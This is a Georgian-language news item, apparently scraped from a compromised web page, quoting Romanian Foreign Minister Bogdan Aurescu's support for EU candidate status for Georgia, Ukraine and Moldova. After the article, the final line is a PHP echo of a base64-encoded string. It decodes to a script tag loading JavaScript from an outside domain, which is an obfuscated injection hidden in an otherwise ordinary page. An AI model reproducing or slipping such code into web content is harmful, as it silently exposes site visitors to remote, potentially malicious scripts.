celsiusi
ავერსი საქკაბელი
რუმინეთის საგარეო საქმეთა მინისტრმა ბოგდან ლუსიან აურესკუმ ბრიუსელში, ევროკავშირის საგარეო საქმეთა მინისტრების შეხვედრამდე განაცხადა, რომ რუმინეთი საქართველოს ევროპული და ევროატლანტიკური პერსპექტივის ერთ-ერთი უდიდესი მხარდამჭერია.
 
"ვთვლით, რომ საქართველოს ადგილი, ისევე როგორც უკრაინისა და მოლდოვის, არის ევროკავშირში, რადგან ისინი ევროპულ ოჯახს მიეკუთვნებიან. ვფიქრობ, წევრობის კანდიდატის სტატუსის მინიჭება სამივე ქვეყნისთვის მნიშვნელოვანია, რადგან ეს არ არის პროცესის დასასრული, ეს მხოლოდ დასაწყისია ძალიან მნიშვნელოვანი პროცესისა და ამ ქვეყნებს სჭირდებათ გზამკვლევი რეფორმებისთვის. ამის შემდეგ პროცესში ჩართული თითოეული ქვეყნის გადასაწყვეტი იქნება ამ გზის გაგრძელდება. ჩვენ, რუმინეთი, მზად ვართ, ამ პროცესს მხარი დავუჭიროთ. ვფიქრობთ, გადაწყვეტილებები საჭიროა და ეს იმპულსი არ უნდა დაიკარგოს. მნიშვნელოვანია, გადაწყვეტილება რაც შეიძლება სწრაფად იქნას მიღებული. ამის შემდეგ ამ ქვეყნებზე იქნება, გააგრძელონ გზა ამ მნიშვნელოვან გზაზე და ჩვენ იქ ვიქნებით, მათ გვერდით, რომ მხარი დავუჭიროთ მათ“, – აღნიშნა რუმინეთის საგარეო საქმეთა მინისტრმა.
 
 
706
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");